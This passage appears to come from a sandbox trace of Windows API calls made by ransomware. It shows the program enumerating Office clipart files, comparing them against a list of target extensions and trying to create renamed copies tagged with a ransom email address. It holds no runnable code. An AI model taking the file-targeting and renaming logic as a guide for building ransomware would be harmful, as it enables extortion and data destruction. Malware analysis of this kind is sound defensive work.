Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.317] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.317] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.317] CloseHandle (hObject=0x414) returned 1 [0171.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.318] lstrlenW (lpString=".doc") returned 4 [0171.318] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.318] lstrlenW (lpString=".docx") returned 5 [0171.318] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.318] lstrlenW (lpString=".pdf") returned 4 [0171.318] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.318] lstrlenW (lpString=".xls") returned 4 [0171.318] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.318] lstrlenW (lpString=".xlsx") returned 5 [0171.318] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.318] lstrlenW (lpString=".ppt") returned 4 [0171.318] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.318] lstrlenW (lpString=".zip") returned 4 [0171.318] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.318] lstrlenW (lpString=".rar") returned 4 [0171.318] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.318] lstrlenW (lpString=".bz2") returned 4 [0171.318] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.319] lstrlenW (lpString=".7z") returned 3 [0171.319] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.319] lstrlenW (lpString=".dbf") returned 4 [0171.319] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.319] lstrlenW (lpString=".1cd") returned 4 [0171.319] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.319] lstrlenW (lpString=".jpg") returned 4 [0171.319] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.319] lstrlenW (lpString=".doc") returned 4 [0171.319] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.319] lstrlenW (lpString=".docx") returned 5 [0171.319] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.319] lstrlenW (lpString=".pdf") returned 4 [0171.319] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.319] lstrlenW (lpString=".xls") returned 4 [0171.319] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.319] lstrlenW (lpString=".xlsx") returned 5 [0171.320] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.320] lstrlenW (lpString=".ppt") returned 4 [0171.320] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.320] lstrlenW (lpString=".zip") returned 4 [0171.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.320] lstrlenW (lpString=".rar") returned 4 [0171.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.320] lstrlenW (lpString=".bz2") returned 4 [0171.320] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.320] lstrlenW (lpString=".7z") returned 3 [0171.320] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.320] lstrlenW (lpString=".dbf") returned 4 [0171.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.320] lstrlenW (lpString=".1cd") returned 4 [0171.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 68 [0171.320] lstrlenW (lpString=".jpg") returned 4 [0171.321] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.321] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0171.321] lstrlenW (lpString="NA02384_.WMF") returned 12 [0171.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.322] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=3032) returned 1 [0171.322] CloseHandle (hObject=0x414) returned 1 [0171.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf")) returned 0x220 [0171.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.322] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.322] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.323] CloseHandle (hObject=0x414) returned 1 [0171.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.323] lstrlenW (lpString=".doc") returned 4 [0171.323] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.323] lstrlenW (lpString=".docx") returned 5 [0171.323] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.323] lstrlenW (lpString=".pdf") returned 4 [0171.323] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.323] lstrlenW (lpString=".xls") returned 4 [0171.323] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.323] lstrlenW (lpString=".xlsx") returned 5 [0171.323] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.323] lstrlenW (lpString=".ppt") returned 4 [0171.323] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.323] lstrlenW (lpString=".zip") returned 4 [0171.324] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.324] lstrlenW (lpString=".rar") returned 4 [0171.324] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.324] lstrlenW (lpString=".bz2") returned 4 [0171.324] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.324] lstrlenW (lpString=".7z") returned 3 [0171.324] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.324] lstrlenW (lpString=".dbf") returned 4 [0171.324] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.324] lstrlenW (lpString=".1cd") returned 4 [0171.324] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.324] lstrlenW (lpString=".jpg") returned 4 [0171.324] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.325] lstrlenW (lpString=".doc") returned 4 [0171.325] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.325] lstrlenW (lpString=".docx") returned 5 [0171.325] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.325] lstrlenW (lpString=".pdf") returned 4 [0171.325] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.325] lstrlenW (lpString=".xls") returned 4 [0171.325] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.325] lstrlenW (lpString=".xlsx") returned 5 [0171.325] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.325] lstrlenW (lpString=".ppt") returned 4 [0171.325] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.325] lstrlenW (lpString=".zip") returned 4 [0171.325] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.325] lstrlenW (lpString=".rar") returned 4 [0171.325] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.325] lstrlenW (lpString=".bz2") returned 4 [0171.325] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.325] lstrlenW (lpString=".7z") returned 3 [0171.325] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.326] lstrlenW (lpString=".dbf") returned 4 [0171.326] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.326] lstrlenW (lpString=".1cd") returned 4 [0171.326] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 68 [0171.326] lstrlenW (lpString=".jpg") returned 4 [0171.326] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.326] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0171.326] lstrlenW (lpString="NA02386_.WMF") returned 12 [0171.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.327] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=2376) returned 1 [0171.327] CloseHandle (hObject=0x414) returned 1 [0171.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf")) returned 0x220 [0171.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.328] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.329] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.331] CloseHandle (hObject=0x414) returned 1 [0171.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.332] lstrlenW (lpString=".doc") returned 4 [0171.332] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.332] lstrlenW (lpString=".docx") returned 5 [0171.332] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.332] lstrlenW (lpString=".pdf") returned 4 [0171.332] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.332] lstrlenW (lpString=".xls") returned 4 [0171.332] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.332] lstrlenW (lpString=".xlsx") returned 5 [0171.332] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.332] lstrlenW (lpString=".ppt") returned 4 [0171.332] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.332] lstrlenW (lpString=".zip") returned 4 [0171.332] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.332] lstrlenW (lpString=".rar") returned 4 [0171.332] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.332] lstrlenW (lpString=".bz2") returned 4 [0171.332] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.332] lstrlenW (lpString=".7z") returned 3 [0171.332] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.333] lstrlenW (lpString=".dbf") returned 4 [0171.333] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.333] lstrlenW (lpString=".1cd") returned 4 [0171.333] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.333] lstrlenW (lpString=".jpg") returned 4 [0171.333] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.333] lstrlenW (lpString=".doc") returned 4 [0171.333] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.333] lstrlenW (lpString=".docx") returned 5 [0171.333] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.333] lstrlenW (lpString=".pdf") returned 4 [0171.333] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.333] lstrlenW (lpString=".xls") returned 4 [0171.333] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.333] lstrlenW (lpString=".xlsx") returned 5 [0171.333] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.333] lstrlenW (lpString=".ppt") returned 4 [0171.334] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.334] lstrlenW (lpString=".zip") returned 4 [0171.334] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.334] lstrlenW (lpString=".rar") returned 4 [0171.334] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.334] lstrlenW (lpString=".bz2") returned 4 [0171.334] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.334] lstrlenW (lpString=".7z") returned 3 [0171.334] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.334] lstrlenW (lpString=".dbf") returned 4 [0171.334] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.334] lstrlenW (lpString=".1cd") returned 4 [0171.334] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 68 [0171.334] lstrlenW (lpString=".jpg") returned 4 [0171.334] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.335] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0171.335] lstrlenW (lpString="NA02388_.WMF") returned 12 [0171.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.335] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=3204) returned 1 [0171.335] CloseHandle (hObject=0x414) returned 1 [0171.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf")) returned 0x220 [0171.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.381] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.381] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.381] CloseHandle (hObject=0x414) returned 1 [0171.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.382] lstrlenW (lpString=".doc") returned 4 [0171.382] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.382] lstrlenW (lpString=".docx") returned 5 [0171.382] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.382] lstrlenW (lpString=".pdf") returned 4 [0171.382] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.382] lstrlenW (lpString=".xls") returned 4 [0171.382] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.382] lstrlenW (lpString=".xlsx") returned 5 [0171.382] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.382] lstrlenW (lpString=".ppt") returned 4 [0171.382] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.382] lstrlenW (lpString=".zip") returned 4 [0171.382] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.382] lstrlenW (lpString=".rar") returned 4 [0171.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.383] lstrlenW (lpString=".bz2") returned 4 [0171.383] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.383] lstrlenW (lpString=".7z") returned 3 [0171.383] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.383] lstrlenW (lpString=".dbf") returned 4 [0171.383] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.383] lstrlenW (lpString=".1cd") returned 4 [0171.386] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.386] lstrlenW (lpString=".jpg") returned 4 [0171.386] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.386] lstrlenW (lpString=".doc") returned 4 [0171.386] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.386] lstrlenW (lpString=".docx") returned 5 [0171.386] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.386] lstrlenW (lpString=".pdf") returned 4 [0171.386] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.386] lstrlenW (lpString=".xls") returned 4 [0171.386] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.386] lstrlenW (lpString=".xlsx") returned 5 [0171.386] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.386] lstrlenW (lpString=".ppt") returned 4 [0171.386] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.386] lstrlenW (lpString=".zip") returned 4 [0171.386] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.386] lstrlenW (lpString=".rar") returned 4 [0171.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.387] lstrlenW (lpString=".bz2") returned 4 [0171.387] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.387] lstrlenW (lpString=".7z") returned 3 [0171.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.387] lstrlenW (lpString=".dbf") returned 4 [0171.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.387] lstrlenW (lpString=".1cd") returned 4 [0171.387] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 68 [0171.387] lstrlenW (lpString=".jpg") returned 4 [0171.387] lstrcmpiW 